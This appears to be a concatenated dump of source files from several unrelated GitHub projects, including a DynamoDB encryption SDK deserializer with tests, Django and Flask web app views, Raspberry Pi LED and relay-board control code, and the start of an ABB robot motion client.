:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.NUMBER_SET.dynamodb_tag: _deserialize_set(stream, _transform_number_value)}
def _deserialize_list(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.LIST]
"""Deserializes a list object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
member_count = decode_length(stream)
return {Tag.LIST.dynamodb_tag: [
_deserialize(stream)
for _ in range(member_count)
]}
def _deserialize_map(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.MAP]
"""Deserializes a map object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
member_count = decode_length(stream)
members = {} # type: dynamodb_types.MAP
for _ in range(member_count):
key = _deserialize(stream)
if Tag.STRING.dynamodb_tag not in key:
raise DeserializationError(
'Malformed serialized map: found "{}" as map key.'.format(list(key.keys())[0])
)
value = _deserialize(stream)
members[key[Tag.STRING.dynamodb_tag]] = value
return {Tag.MAP.dynamodb_tag: members}
def _deserialize_function(tag):
# type: (bytes) -> Callable
"""Identifies the correct deserialization function based on the provided tag.
:param tag: Identifying tag, read from start of serialized object
:type tag: dynamodb_encryption_sdk.internal.identifiers.Tag
:rtype: callable
"""
deserialize_functions = {
Tag.BINARY.tag: _deserialize_binary,
Tag.BINARY_SET.tag: _deserialize_binary_set,
Tag.NUMBER.tag: _deserialize_number,
Tag.NUMBER_SET.tag: _deserialize_number_set,
Tag.STRING.tag: _deserialize_string,
Tag.STRING_SET.tag: _deserialize_string_set,
Tag.BOOLEAN.tag: _deserialize_boolean,
Tag.NULL.tag: _deserialize_null,
Tag.LIST.tag: _deserialize_list,
Tag.MAP.tag: _deserialize_map
}
try:
return deserialize_functions[tag]
except KeyError:
raise DeserializationError('Unsupported tag: "{}"'.format(tag))
def _deserialize(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.RAW_ATTRIBUTE]
"""Deserializes a serialized object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
try:
tag = decode_tag(stream)
return _deserialize_function(tag)(stream)
except struct.error:
raise DeserializationError('Malformed serialized data')
if not serialized_attribute:
raise DeserializationError('Empty serialized attribute data')
stream = io.BytesIO(serialized_attribute)
return _deserialize(stream)
```
#### File: test/functional/hypothesis_strategies.py
```python
from decimal import Decimal
from boto3.dynamodb.types import Binary
import hypothesis
from hypothesis.strategies import (
binary, booleans, deferred, dictionaries, fractions, just, lists, none, sets, text
)
SLOW_SETTINGS = hypothesis.settings(
suppress_health_check=(
hypothesis.HealthCheck.too_slow,
hypothesis.HealthCheck.data_too_large,
hypothesis.HealthCheck.hung_test,
hypothesis.HealthCheck.large_base_example
),
timeout=hypothesis.unlimited,
deadline=None
)
VERY_SLOW_SETTINGS = hypothesis.settings(
SLOW_SETTINGS,
max_examples=1000,
max_iterations=1500
)
MAX_ITEM_BYTES = 400 * 1024 * 1024
# _MIN_NUMBER = Decimal('1E-128') # The DDB min is 1E-130, but DYNAMODB_CONTEXT Emin is -128
# _MAX_NUMBER = Decimal('9.9999999999999999999999999999999999999E+125')
# TODO: I would like to test the full range of possible number values, but boto3 does not
# correctly handle conversion of large edge case values at this time. We will work to fix
# that, but in the meantime, we will just use the happy path numbers.
_MIN_NUMBER = Decimal('1E-38')
_MAX_NUMBER = Decimal('9.{}E37'.format('9' * 37))
ddb_string = text(
min_size=1,
max_size=MAX_ITEM_BYTES
)
ddb_string_set = sets(ddb_string, min_size=1)
def _ddb_fraction_to_decimal(val):
"""Hypothesis does not support providing a custom Context, so working around that."""
return Decimal(val.numerator) / Decimal(val.denominator)
def _negative(val):
return val * Decimal('-1')
ddb_positive_numbers = fractions(
min_value=_MIN_NUMBER,
max_value=_MAX_NUMBER
).map(_ddb_fraction_to_decimal)
ddb_negative_numbers = ddb_positive_numbers.map(_negative)
ddb_number = ddb_negative_numbers | just(Decimal('0')) | ddb_positive_numbers
ddb_number_set = sets(ddb_number, min_size=1)
ddb_binary = binary(min_size=1, max_size=MAX_ITEM_BYTES).map(Binary)
ddb_binary_set = sets(ddb_binary, min_size=1)
ddb_boolean = booleans()
ddb_null = none()
ddb_scalar_types = (
ddb_string |
ddb_number |
ddb_binary |
ddb_boolean |
ddb_null
)
ddb_set_types = (
ddb_string_set |
ddb_number_set |
ddb_binary_set
)
ddb_attribute_names = text(
min_size=1,
max_size=255
)
# TODO: List and Map types have a max depth of 32
ddb_map_type = deferred(lambda: dictionaries(
keys=ddb_attribute_names,
values=(
ddb_scalar_types |
ddb_set_types |
ddb_list_type |
ddb_map_type
),
min_size=1
))
ddb_list_type = deferred(lambda: lists(
ddb_scalar_types |
ddb_set_types |
ddb_list_type |
ddb_map_type,
min_size=1
))
ddb_document_types = ddb_map_type | ddb_list_type
ddb_attribute_values = ddb_scalar_types | ddb_set_types | ddb_list_type
ddb_items = dictionaries(
keys=ddb_attribute_names,
values=ddb_attribute_values,
min_size=1
)
material_descriptions = deferred(lambda: dictionaries(
keys=text(),
values=text(),
min_size=1
))
```
#### File: internal/crypto/test_authentication.py
```python
import pytest
from dynamodb_encryption_sdk.internal.crypto.authentication import _string_to_sign
from ...functional_test_vector_generators import string_to_sign_test_vectors
pytestmark = [pytest.mark.functional, pytest.mark.local]
@pytest.mark.parametrize('item, table_name, attribute_actions, expected_result', string_to_sign_test_vectors())
def test_string_to_sign(item, table_name, attribute_actions, expected_result):
generated_string = _string_to_sign(item, table_name, attribute_actions)
assert generated_string == expected_result
```
#### File: test/functional/test_structures.py
```python
import boto3
import pytest
from dynamodb_encryption_sdk.exceptions import InvalidArgumentError
from dynamodb_encryption_sdk.identifiers import CryptoAction
from dynamodb_encryption_sdk.structures import AttributeActions, TableIndex, TableInfo
from .functional_test_utils import (
example_table, table_with_global_seconary_indexes, table_with_local_seconary_indexes, TEST_TABLE_NAME
)
pytestmark = [pytest.mark.functional, pytest.mark.local]
# TODO: There is a way to parameterize fixtures, but the existing docs on that are very unclear.
# This will get us what we need for now, but we should come back to this to clean this up later.
def test_tableinfo_refresh_indexes_no_secondary_indexes(example_table):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
def test_tableinfo_refresh_indexes_with_gsis(table_with_global_seconary_indexes):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
def test_tableinfo_refresh_indexes_with_lsis(table_with_local_seconary_indexes):
client = boto3.client('dynamodb', region_name='us-west-2')
table = TableInfo(name=TEST_TABLE_NAME)
table.refresh_indexed_attributes(client)
@pytest.mark.parametrize('kwargs, expected_attributes', (
(dict(partition='partition_name'), set(['partition_name'])),
(dict(partition='partition_name', sort='sort_name'), set(['partition_name', 'sort_name']))
))
def test_tableindex_attributes(kwargs, expected_attributes):
index = TableIndex(**kwargs)
assert index.attributes == expected_attributes
@pytest.mark.parametrize('key_schema, expected_kwargs', (
(
[
{
'KeyType': 'HASH',
'AttributeName': 'partition_name'
}
],
dict(partition='partition_name')
),
(
[
{
'KeyType': 'HASH',
'AttributeName': 'partition_name'
},
{
'KeyType': 'RANGE',
'AttributeName': 'sort_name'
}
],
dict(partition='partition_name', sort='sort_name')
)
))
def test_tableindex_from_key_schema(key_schema, expected_kwargs):
index = TableIndex.from_key_schema(key_schema)
expected_index = TableIndex(**expected_kwargs)
assert index == expected_index
@pytest.mark.parametrize('default, overrides, expected_result', (
(CryptoAction.ENCRYPT_AND_SIGN, {}, CryptoAction.SIGN_ONLY),
(CryptoAction.SIGN_ONLY, {}, CryptoAction.SIGN_ONLY),
(CryptoAction.DO_NOTHING, {}, CryptoAction.DO_NOTHING),
(CryptoAction.ENCRYPT_AND_SIGN, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.ENCRYPT_AND_SIGN, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING),
(CryptoAction.SIGN_ONLY, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.SIGN_ONLY, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING),
(CryptoAction.DO_NOTHING, {'indexed_attribute': CryptoAction.SIGN_ONLY}, CryptoAction.SIGN_ONLY),
(CryptoAction.DO_NOTHING, {'indexed_attribute': CryptoAction.DO_NOTHING}, CryptoAction.DO_NOTHING)
))
def test_attribute_actions_index_override(default, overrides, expected_result):
test = AttributeActions(default_action=default, attribute_actions=overrides)
test.set_index_keys('indexed_attribute')
assert test.action('indexed_attribute') is expected_result
@pytest.mark.parametrize('default', CryptoAction)
def test_attribute_actions_index_override_fail(default):
test = AttributeActions(
default_action=default,
attribute_actions={'indexed_attribute': CryptoAction.ENCRYPT_AND_SIGN}
)
with pytest.raises(InvalidArgumentError) as excinfo:
test.set_index_keys('indexed_attribute')
excinfo.match(r'Cannot overwrite a previously requested action on indexed attribute: *')
``` |
{
"source": "johnwanjema/gallery",
"score": 2
} |
#### File: gallery/photos/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image
# Create your views here.
def index(request):
images = Image.get_allImages()
return render(request, 'index.html',{"images":images})
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
print(search_term)
searched_images = Image.search_image_by_category(search_term)
print(searched_images)
message = f"{search_term}"
return render(request, 'search.html',{"message":message,"images": searched_images})
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
def nairobi(request):
images = Image.search_image_by_location('nairobi')
return render(request,'nairobi.html',{"images":images})
def tokyo(request):
images = Image.search_image_by_location('tokyo')
return render(request,'tokyo.html',{"images":images})
def rio(request):
images = Image.search_image_by_location('rio')
return render(request,'rio.html',{"images":images})
def berlin(request):
images = Image.search_image_by_location('berlin')
return render(request,'berlin.html',{"images":images})
``` |
{
"source": "johnwanjema/news-highlight",
"score": 3
} |
#### File: news-highlight/test/news_article_test.py
```python
import unittest
from app.models import Articles
class SourcesTest(unittest.TestCase):
'''
Test Class to test the behaviour of the sources class
'''
def setUp(self):
'''
Set up method that will run before every Test
'''
self.new_source = Articles(111,"abc","trump visita japan", "abc.com","https://www.abc.net.au/news/image/11232934-16x9-700x394.jpg","japan to welcome trump","2019-06-23T08:31:32Z")
def test_instance(self):
self.assertTrue(isinstance(self.new_source,Sources))
``` |
{
"source": "johnwanjema/pitches",
"score": 2
} |
#### File: app/main/views.py
```python
from flask import render_template, request, redirect, url_for,abort
from . import main
from .. import db,photos
from .forms import PitchForm,CommentForm,UpdateProfile
from flask import render_template, flash,request
from flask import render_template,redirect,url_for
from ..models import User,Pitch,Comments
from .. import db
from flask_login import login_user,logout_user,login_required,current_user
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
title = "pitches"
return render_template('index.html',title = title )
@main.route('/pitches')
@login_required
def pitches():
pitches = Pitch.query.all()
interview_pitch = Pitch.get_pitches_by_category('1')
pickup_lines = Pitch.get_pitches_by_category('2')
product_pitch = Pitch.get_pitches_by_category('3')
promotion_pitch = Pitch.get_pitches_by_category('4')
if pitches is None:
return redirect(url_for('main.pitch'))
title = "pitches"
return render_template("pitch.html", pitches = pitches, interviews = interview_pitch, pickups = pickup_lines,products = product_pitch,promotions = promotion_pitch )
@main.route('/pitch', methods = ['GET','POST'])
@login_required
def pitch():
form = PitchForm()
if form.validate_on_submit():
pitch = Pitch(pitch = form.pitch.data, user_id = current_user.id,pitch_title = form.pitch_title.data,pitch_category = form.pitch_category.data ,pitch_upvotes = 0, pitch_downvotes = 0)
db.session.add(pitch)
db.session.commit()
return redirect(url_for('main.index'))
title = "pitches"
return render_template('new_pitch.html',pitch_form = form)
@main.route('/comment/<int:id>', methods=['GET', 'POST'])
@login_required
def post_comment(id):
form = CommentForm()
title = 'post comment'
pitch = Pitch.get_pitch(id)
if request.args.get("upvote"):
pitch.pitch_upvotes += 1
db.session.add(pitch)
db.session.commit()
return redirect("/comment/{pitch_id}".format(pitch_id=pitch.id))
elif request.args.get("downvote"):
pitch.pitch_downvotes += 1
db.session.add(pitch)
db.session.commit()
return redirect("/comment/{pitch_id}".format(pitch_id=pitch.id))
comments = Comments.query.filter_by().all()
if pitches is None:
abort(404)
if form.validate_on_submit():
comment = form.comment.data
new_comment = Comments( comment = comment, user_id = current_user.id, pitch_id = pitches.id)
db.session.add(new_comment)
db.session.commit()
return redirect(url_for('main.pitches'))
return render_template('post_comment.html', comment_form=form, title=title,comments=comments , pitch = pitch)
@main.route('/user/<uname>/<int:id>')
def profile(uname,id):
user = User.query.filter_by(username = uname).first()
pitches = Pitch.query.filter_by(user_id=id)
if user is None:
abort(404)
return render_template("profile/profile.html", user = user , pitches = pitches)
@main.route('/user/<uname>/update',methods = ['GET','POST'])
@login_required
def update_profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
form = UpdateProfile()
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username,))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname,id= current_user.id))
``` |
{
"source": "johnwargo/pi-remind-hd-notify",
"score": 2
} |
#### File: johnwargo/pi-remind-hd-notify/settings.py
```python
import datetime
import logging
import json
# string displayed by assert statement
CONFIG_ERROR = 'Configuration data not available'
# the config object properties, used when validating the config
CONFIG_PROPERTIES = ["access_token", "busy_only", "debug_mode", "display_meeting_summary", "device_id",
"ignore_in_summary", "reboot_counter_limit", "reminder_only", "use_reboot_counter",
"use_remote_notify", "use_working_hours", "work_start", "work_end"]
# a place to hold the object from the config file
_config = None
class Settings:
# singleton instance of this class
__instance = None
# Class variables
_busy_only = None
_debug_mode = None
_display_meeting_summary = None
_ignore_in_summary = None
_reminder_only = None
_use_remote_notify = None
_access_token = None
_device_id = None
_use_reboot_counter = None
_reboot_counter_limit = None
_use_working_hours = None
_work_end = None
_work_start = None
def __init__(self):
global _config
if Settings.__instance is None:
# then we've not initialized yet
logging.info('Settings: Initializing class')
# we're creating an instance of the class, so set that here
Settings.__instance = self
logging.info('Settings: Opening project configuration file (config.json)')
# Read the config file contents
# https://martin-thoma.com/configuration-files-in-python/
with open("config.json") as json_data_file:
_config = json.load(json_data_file)
# did the config read correctly?
if _config is not None:
logging.info('Config file read')
Settings._busy_only = self.get_config_value(_config, 'busy_only', False)
Settings._debug_mode = self.get_config_value(_config, 'debug_mode', False)
Settings._display_meeting_summary = self.get_config_value(_config, 'display_meeting_summary', True)
Settings._ignore_in_summary = self.get_config_value(_config, 'ignore_in_summary', [])
Settings._reminder_only = self.get_config_value(_config, 'reminder_only', False)
Settings._use_reboot_counter = self.get_config_value(_config, 'use_reboot_counter', False)
logging.info('Busy only: {}'.format(Settings._busy_only))
logging.info('Debug Mode: {}'.format(Settings._debug_mode))
logging.info('Display Meeting Summary: {}'.format(Settings._display_meeting_summary))
logging.info('Ignore in Meeting Summary: {}'.format(Settings._ignore_in_summary))
logging.info('Reminder Only: {}'.format(Settings._reminder_only))
logging.info('Use Reboot Counter: {}'.format(Settings._use_reboot_counter))
if Settings._use_reboot_counter:
Settings._reboot_counter_limit = self.get_config_value(_config, 'reboot_counter_limit', 10)
logging.info('Reboot Counter Limit: {}'.format(Settings._reboot_counter_limit))
Settings._use_remote_notify = self.get_config_value(_config, 'use_remote_notify', False)
logging.info('Use Remote Notify: {}'.format(Settings._use_remote_notify))
# if remote notify is enabled, that's the only time we need...
if Settings._use_remote_notify:
Settings._access_token = self.get_config_value(_config, 'access_token', "")
Settings._device_id = self.get_config_value(_config, 'device_id', "")
logging.info('Access Token: {}'.format(Settings._access_token))
logging.info('Device ID: {}'.format(Settings._device_id))
Settings._use_working_hours = self.get_config_value(_config, 'use_working_hours', False)
logging.debug('Use Working Hours: {}'.format(Settings._use_working_hours))
if Settings._use_working_hours:
# if working hours are enabled, that's the only time we need...
# convert the time string to a time value
Settings._work_start = datetime.datetime.strptime(
self.get_config_value(_config, 'work_start', "8:00"), '%H:%M').time()
Settings._work_end = datetime.datetime.strptime(
self.get_config_value(_config, 'work_end', "17:30"), '%H:%M').time()
logging.info('Work Start: {}'.format(Settings._work_start))
logging.info('Work End: {}'.format(Settings._work_end))
else:
logging.info('Using existing Settings class')
@staticmethod
def get_instance():
if Settings.__instance is None:
Settings()
return Settings.__instance
@staticmethod
def validate_config_options():
# list config options, especially missing ones
global _config
# don't do anything if we don't have a config file read
assert _config is not None, CONFIG_ERROR
# Returns a list of missing attributes for the object
# These logging statements are info because debug won't be set until after
# the app validates the config file
logging.info('Validating configuration file')
res = []
for i, val in enumerate(CONFIG_PROPERTIES):
try:
prop = _config[val]
logging.info("Config: {}: {}".format(val, prop))
except KeyError:
logging.error("Config: {}: MISSING".format(val))
res.append(val)
@staticmethod
def get_config_value(config_object, key, default_value):
logging.info('get_config_value(_config, {}, {})'.format(key, default_value))
try:
value = config_object[key]
if value:
return value
else:
return default_value
except KeyError:
return default_value
@staticmethod
def get_access_token():
assert Settings._use_remote_notify is True, "Remote Notify disabled"
return Settings._access_token
@staticmethod
def get_busy_only():
return Settings._busy_only
@staticmethod
def get_debug_mode():
return Settings._debug_mode
@staticmethod
def get_device_id():
assert Settings._use_remote_notify is True, "Remote Notify disabled"
return Settings._device_id
@staticmethod
def get_display_meeting_summary():
return Settings._display_meeting_summary
@staticmethod
def get_ignore_in_summary():
return Settings._ignore_in_summary
@staticmethod
def get_reminder_only():
return Settings._reminder_only
@staticmethod
def get_use_reboot_counter():
return Settings._use_reboot_counter
@staticmethod
def get_reboot_counter_limit():
assert Settings._use_reboot_counter is True, "Reboot counter disabled"
return Settings._reboot_counter_limit
@staticmethod
def get_use_remote_notify():
return Settings._use_remote_notify
@staticmethod
def get_use_working_hours():
return Settings._use_working_hours
@staticmethod
def get_work_start():
assert Settings._use_working_hours is True, "Working hours disabled"
return Settings._work_start
@staticmethod
def get_work_end():
assert Settings._use_working_hours is True, "Working hours disabled"
return Settings._work_end
```
#### File: johnwargo/pi-remind-hd-notify/unicorn_hat.py
```python
import math
import time
import unicornhathd
# =======================================================================================
# Borrowed from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/text.py
# =======================================================================================
try:
from PIL import Image, ImageDraw, ImageFont
except ImportError:
exit("This script requires the pillow module\nInstall with: sudo pip install pillow")
# =======================================================================================
# COLORS
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
ORANGE = (255, 153, 0)
WHITE = (255, 255, 255)
YELLOW = (255, 255, 0)
BLACK = (0, 0, 0)
# constants used in the app to display status
CHECKING_COLOR = BLUE
SUCCESS_COLOR = GREEN
FAILURE_COLOR = RED
current_activity_light = 0
indicator_row = 0
u_height = 0
u_width = 0
def init():
global current_activity_light, indicator_row, u_height, u_width
# Clear the display (just in case)
unicornhathd.clear()
# Initialize all LEDs to black
unicornhathd.set_all(0, 0, 0)
# set the display orientation to zero degrees
unicornhathd.rotation(90)
# set u_width and u_height with the appropriate parameters for the HAT
u_width, u_height = unicornhathd.get_shape()
# calculate where we want to put the indicator light
indicator_row = u_height - 1
# The app flashes a GREEN light in the first row every time it connects to Google to check the calendar.
# The LED increments every time until it gets to the other side then starts over at the beginning again.
# The current_activity_light variable keeps track of which light lit last. At start it's at -1 and goes from there.
current_activity_light = u_width
# Set a specific brightness level for the Pimoroni Unicorn HAT, otherwise it's pretty bright.
# Comment out the line below to see what the default looks like.
unicornhathd.brightness(0.5)
def display_text(message, color=WHITE):
# Use `fc-list` to show a list of installed fonts on your system,
# or `ls /usr/share/fonts/` and explore.
FONT = ('/usr/share/fonts/truetype/roboto/Roboto-Bold.ttf', 10)
global u_height, u_width
# do we have a message?
if len(message) > 0:
# then display it
# code borrowed from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/text.py
text_x = u_width
text_y = 2
font_file, font_size = FONT
font = ImageFont.truetype(font_file, font_size)
# =====================================================================
# I'm really not sure what all this code does...that's what happens when you 'borrow' code
# it basically sets up the width of the display string to include the string as well as enough
# space to scroll it off the screen
# =====================================================================
text_width, text_height = u_width, 0
w, h = font.getsize(message)
text_width += w + u_width
text_height = max(text_height, h)
text_width += u_width + text_x + 1
image = Image.new("RGB", (text_width, max(16, text_height)), (0, 0, 0))
draw = ImageDraw.Draw(image)
offset_left = 0
draw.text((text_x + offset_left, text_y), message, color, font=font)
offset_left += font.getsize(message)[0] + u_width
for scroll in range(text_width - u_width):
for x in range(u_width):
for y in range(u_height):
pixel = image.getpixel((x + scroll, y))
r, g, b = [int(n) for n in pixel]
unicornhathd.set_pixel(u_width - 1 - x, y, r, g, b)
unicornhathd.show()
time.sleep(0.01)
unicornhathd.off()
# =====================================================================
def swirl(x, y, step):
global u_height, u_width
# modified from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/demo.py
x -= (u_width / 2)
y -= (u_height / 2)
dist = math.sqrt(pow(x, 2) + pow(y, 2)) / 2.0
angle = (step / 10.0) + (dist * 1.5)
s = math.sin(angle)
c = math.cos(angle)
xs = x * c - y * s
ys = x * s + y * c
r = abs(xs + ys)
r = r * 12.0
r -= 20
return r, r + (s * 130), r + (c * 130)
def do_swirl(duration):
# modified from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/demo.py
step = 0
for i in range(duration):
for y in range(u_height):
for x in range(u_width):
r, g, b = swirl(x, y, step)
r = int(max(0, min(255, r)))
g = int(max(0, min(255, g)))
b = int(max(0, min(255, b)))
unicornhathd.set_pixel(x, y, r, g, b)
step += 2
unicornhathd.show()
time.sleep(0.01)
# turn off all lights when you're done
unicornhathd.off()
def set_activity_light(color, increment):
# used to turn on one LED at a time across the bottom row of lights. The app uses this as an unobtrusive
# indicator when it connects to Google to check the calendar. Its intended as a subtle reminder that things
# are still working.
global current_activity_light
# turn off (clear) any lights that are on
unicornhathd.off()
if increment:
# OK. Which light will we be illuminating?
if current_activity_light < 1:
# start over at the beginning when you're at the end of the row
current_activity_light = u_width
# increment the current light (to the next one)
current_activity_light -= 1
# set the pixel color
unicornhathd.set_pixel(current_activity_light, indicator_row, *color)
# show the pixel
unicornhathd.show()
def set_all(color):
unicornhathd.set_all(*color)
unicornhathd.show()
def flash_all(flash_count, delay, color):
# light all of the LEDs in a RGB single color. Repeat 'flash_count' times
# keep illuminated for 'delay' value
for index in range(flash_count):
# fill the light buffer with the specified color
unicornhathd.set_all(*color)
# show the color
unicornhathd.show()
# wait a bit
time.sleep(delay)
# turn everything off
unicornhathd.off()
# wait a bit more
time.sleep(delay)
def flash_random(flash_count, delay, between_delay=0):
# Copied from https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/test.py
for index in range(flash_count):
# fill the light buffer with random colors
unicornhathd._buf = unicornhathd.numpy.random.randint(low=0, high=255, size=(16, 16, 3))
# show the colors
unicornhathd.show()
# wait a bit
time.sleep(delay)
# turn everything off
unicornhathd.off()
# do we have a between_delay value??
if between_delay > 0:
# wait a bit more
time.sleep(between_delay)
def off():
unicornhathd.off()
``` |
{
"source": "johnwargo/raspberry-pi-relay-controller-seeed",
"score": 3
} |
#### File: johnwargo/raspberry-pi-relay-controller-seeed/relay_lib_seeed.py
```python
from __future__ import print_function
import smbus
# The number of relay ports on the relay board.
# This value should never change!
NUM_RELAY_PORTS = 4
# Change the following value if your Relay board uses a different I2C address.
DEVICE_ADDRESS = 0x20 # 7 bit address (will be left shifted to add the read write bit)
# Don't change the values, there's no need for that.
DEVICE_REG_MODE1 = 0x06
DEVICE_REG_DATA = 0xff
bus = smbus.SMBus(1) # 0 = /dev/i2c-0 (port I2C0), 1 = /dev/i2c-1 (port I2C1)
def relay_on(relay_num):
"""Turn the specified relay (by relay #) on.
Call this function to turn a single relay on.
Args:
relay_num (int): The relay number that you want turned on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
if isinstance(relay_num, int):
# do we have a valid relay number?
if 0 < relay_num <= NUM_RELAY_PORTS:
print('Turning relay', relay_num, 'ON')
DEVICE_REG_DATA &= ~(0x1 << (relay_num - 1))
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
else:
print('Invalid relay #:', relay_num)
else:
print('Relay number must be an Integer value')
def relay_off(relay_num):
"""Turn the specified relay (by relay #) off.
Call this function to turn a single relay off.
Args:
relay_num (int): The relay number that you want turned off.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
if isinstance(relay_num, int):
# do we have a valid relay number?
if 0 < relay_num <= NUM_RELAY_PORTS:
print('Turning relay', relay_num, 'OFF')
DEVICE_REG_DATA |= (0x1 << (relay_num - 1))
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
else:
print('Invalid relay #:', relay_num)
else:
print('Relay number must be an Integer value')
def relay_all_on():
"""Turn all of the relays on.
Call this function to turn all of the relays on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
print('Turning all relays ON')
DEVICE_REG_DATA &= ~(0xf << 0)
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
def relay_all_off():
"""Turn all of the relays on.
Call this function to turn all of the relays on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
print('Turning all relays OFF')
DEVICE_REG_DATA |= (0xf << 0)
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
def relay_toggle_port(relay_num):
"""Toggle the specified relay (on to off, or off to on).
Call this function to toggle the status of a specific relay.
Args:
relay_num (int): The relay number to toggle.
"""
print('Toggling relay:', relay_num)
if relay_get_port_status(relay_num):
# it's on, so turn it off
relay_off(relay_num)
else:
# it's off, so turn it on
relay_on(relay_num)
def relay_get_port_status(relay_num):
"""Returns the status of the specified relay (True for on, False for off)
Call this function to retrieve the status of a specific relay.
Args:
relay_num (int): The relay number to query.
"""
# determines whether the specified port is ON/OFF
global DEVICE_REG_DATA
print('Checking status of relay', relay_num)
res = relay_get_port_data(relay_num)
if res > 0:
mask = 1 << (relay_num - 1)
# return the specified bit status
# return (DEVICE_REG_DATA & mask) != 0
return (DEVICE_REG_DATA & mask) == 0
else:
# otherwise (invalid port), always return False
print("Specified relay port is invalid")
return False
def relay_get_port_data(relay_num):
"""Internal function, used to retrieve binary data from the relay board.
Args:
relay_num (int): The relay port to query.
"""
# gets the current byte value stored in the relay board
global DEVICE_REG_DATA
print('Reading relay status value for relay', relay_num)
# do we have a valid port?
if 0 < relay_num <= NUM_RELAY_PORTS:
# read the memory location
DEVICE_REG_DATA = bus.read_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1)
# return the specified bit status
return DEVICE_REG_DATA
else:
# otherwise (invalid port), always return 0
print("Specified relay port is invalid")
return 0
``` |
{
"source": "johnwargo/raspberry-pi-relay-timer",
"score": 4
} |
#### File: johnwargo/raspberry-pi-relay-timer/relay.py
```python
import gpiozero
# used to track the current state of the relay. At the start, the
# application turns the relay off then sets this variable's value
# the application can then later query this to determine what the
# current state is for the relay, in the toggle function for example.
_relay_status = False
relay = None
def init(relay_pin):
# initialize the relay object
print("Initializing relay object")
global relay
relay = gpiozero.OutputDevice(relay_pin, active_high=True, initial_value=False)
def status():
return _relay_status
def set_status(the_status):
# sets the relay's status based on the boolean value passed to the function
# a value of True turns the relay on, a value of False turns the relay off
global _relay_status
global relay
if relay is not None:
_relay_status = the_status
if the_status:
print("Setting relay: ON")
relay.on()
else:
print("Setting relay: OFF")
relay.off()
else:
print("You must initialize the relay before you can use it")
def toggle():
# toggles the relay's status. If the relay is on, when you call this function,
# it will turn the relay off. If the relay is off, when you call this function,
# it will turn the relay on. Easy peasy, right?
global _relay_status
global relay
if relay is not None:
# flip our relay status value
_relay_status = not _relay_status
if _relay_status:
print("Toggling relay: ON")
else:
print("Toggling relay: OFF")
relay.toggle()
else:
print("You must initialize the relay before you can use it")
``` |
{
"source": "johnwargo/seeed-studio-relay-v2",
"score": 3
} |
#### File: johnwargo/seeed-studio-relay-v2/relay_lib_seeed_test_2.py
```python
import sys
import time
from seeed_relay_v1 import Relay
def process_loop():
# turn all of the relays on
relay.all_on()
relay.print_status_all()
# wait a second
time.sleep(1)
# turn all of the relays off
relay.all_off()
relay.print_status_all()
# wait a second
time.sleep(1)
# now cycle each relay every second in an infinite loop
while True:
# test the on/off methods
print('Testing on/off methods')
for i in range(1, 5):
relay.on(i)
relay.print_status_all()
time.sleep(1)
relay.off(i)
relay.print_status_all()
time.sleep(1)
# test the toggle method
print('Testing the toggle methods')
for i in range(1, 5):
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
print('Repeating loop')
# Now see what we're supposed to do next
if __name__ == "__main__":
# Create the relay object
relay = Relay()
try:
process_loop()
except KeyboardInterrupt:
print("\nExiting application")
# turn off all of the relays
relay.all_off()
# exit the application
sys.exit(0)
``` |
{
"source": "johnwason/abb_motion_program_exec",
"score": 2
} |
#### File: johnwason/abb_motion_program_exec/abb_motion_program_exec_client.py
```python
import re
from typing import Callable, NamedTuple, Any, List
import struct
import numpy as np
import io
import requests
from bs4 import BeautifulSoup
import time
import datetime
class speeddata(NamedTuple):
v_tcp: float
v_ori: float
v_leax: float
v_reax: float
